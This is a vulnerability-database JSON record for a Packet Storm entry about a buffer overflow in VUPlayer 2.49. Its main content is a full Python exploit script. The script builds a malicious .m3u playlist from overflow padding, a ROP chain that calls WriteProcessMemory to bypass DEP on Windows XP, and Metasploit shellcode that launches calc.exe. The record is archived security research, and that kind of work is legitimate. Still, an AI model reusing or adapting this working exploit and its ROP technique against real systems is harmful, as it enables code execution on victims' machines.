DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:90363", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "VUPlayer 2.49 .M3U Universal Buffer Overflow With DEP Bypass", "description": "", "published": "2010-06-08T00:00:00", "modified": "2010-06-08T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/90363/VUPlayer-2.49-.M3U-Universal-Buffer-Overflow-With-DEP-Bypass.html", "reporter": "mr_me", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:23:32", "viewCount": 12, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.8}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678921929}, "_internal": {"score_hash": "b63d5d5c6d29b83723c9220ac9d5f002"}, "sourceHref": "https://packetstormsecurity.com/files/download/90363/vuplayerdepbypass-overflow.txt", "sourceData": "`#!/usr/bin/env python \n# \n# VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass \n# Author: mr_me \n# Download: http://vuplayer.com/ \n# Tested on Wind0ws XP SP3 /noexecute=alwayson \n# Greetz: Corelan Security Team \n# http://www.corelan.be:8800/index.php/security/corelan-team-members/ \n# \n# DEP AlwaysOn bypass version \n# Thanks to Sud0 & Lincoln, for the motivation to learn this :-) \n# \n \n# http://www.metasploit.com \n# EXITFUNC=process, CMD=calc.exe \nsc = (\"\\x89\\xe1\\xd9\\xee\\xd9\\x71\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\" \n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\" \n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\" \n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\" \n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a\" \n\"\\x48\\x47\\x34\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\" \n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x45\\x55\\x42\\x58\\x45\\x51\\x4a\\x4f\\x4c\" \n\"\\x4b\\x50\\x4f\\x45\\x48\\x4c\\x4b\\x51\\x4f\\x51\\x30\\x43\\x31\\x4a\" \n\"\\x4b\\x51\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\" \n\"\\x51\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4d\\x54\\x49\\x50\\x42\\x54\\x45\" \n\"\\x57\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x48\\x42\\x4a\\x4b\\x4c\" \n\"\\x34\\x47\\x4b\\x50\\x54\\x47\\x54\\x45\\x54\\x43\\x45\\x4b\\x55\\x4c\" \n\"\\x4b\\x51\\x4f\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\\x4c\\x4b\\x44\" \n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\" \n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4c\\x49\\x51\\x4c\\x46\" \n\"\\x44\\x44\\x44\\x48\\x43\\x51\\x4f\\x50\\x31\\x4a\\x56\\x45\\x30\\x50\" \n\"\\x56\\x42\\x44\\x4c\\x4b\\x51\\x56\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\" \n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x43\\x58\\x45\" \n\"\\x58\\x4b\\x39\\x4a\\x58\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x43\" \n\"\\x58\\x4a\\x50\\x4d\\x5a\\x44\\x44\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b\" \n\"\\x4e\\x4c\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x43\" \n\"\\x51\\x42\\x4c\\x42\\x43\\x43\\x30\\x41\\x41\"); \n \ncrash = \"HTTP://\" + \"\\x41\" * 1005 \n \nrop = \"\\xd3\\x72\\x60\\x10\" # POPAD # JE SHORT BASSMIDI.10607337 : 0x106072D3 \nrop += \"\\x2f\\x10\\x60\\x10\" # POP EDI # MOV EAX,ESI # POP ESI # RETN : 0x1060102F \nrop += \"\\x13\\x22\\x80\\x7c\" # @ of WriteProcessMemory() : 0x7C802213 \nrop += \"\\xcf\\x22\\x80\\x7c\" # Address to patched in kernel32 : 0x7C8022CF \nrop += \"\\x44\\x44\\x44\\x44\" # JUNK : 0x44444444 \nrop += \"\\xff\\xff\\xff\\xff\" # start @ -1 for shellcode size : 0xffffffff \nrop += \"\\x15\\x10\\x10\\x10\" # This @ from .data segment of app dll : 0x10101015 \nrop += \"\\x44\\x44\\x44\\x44\" # JUNK : 0x44444444 \nrop += \"\\x44\\x44\\x44\\x44\" # JUNK : 0x44444444 \nrop += \"\\x44\\x44\\x44\\x44\" # JUNK : 0x44444444 \nrop += \"\\x79\\x21\\x60\\x10\" # POP EDI # POP ESI # RETN : 0x10602179 \nrop += \"\\x88\\x71\\x60\\x10\" # CALL EAX : 0x10607188 \nrop += \"\\xff\\xff\\xff\\xff\" # -hProcess argv[1] : 0xffffffff \n \n# Get the length of shellcode - @ from kernel32 \nrop += \"\\x6f\\x10\\x81\\x7c\" * 305 # INC EBX # RETN : 0x7C81106F \n \n# push all args on the stack for WPM() - @ from shell32.dll \nrop += \"\\xf9\\x18\\xa1\\x7c\" # PUSHAD # RETN : 0x7CA118F9 \n \nbuffer = crash + rop + sc \n \nprint \"[+] Building .m3u file\" \nfile = open('cst-vuplayer.m3u','w'); \nfile.write(buffer); \nfile.close(); \nprint \"[+] Done\" \n`\n"}

{}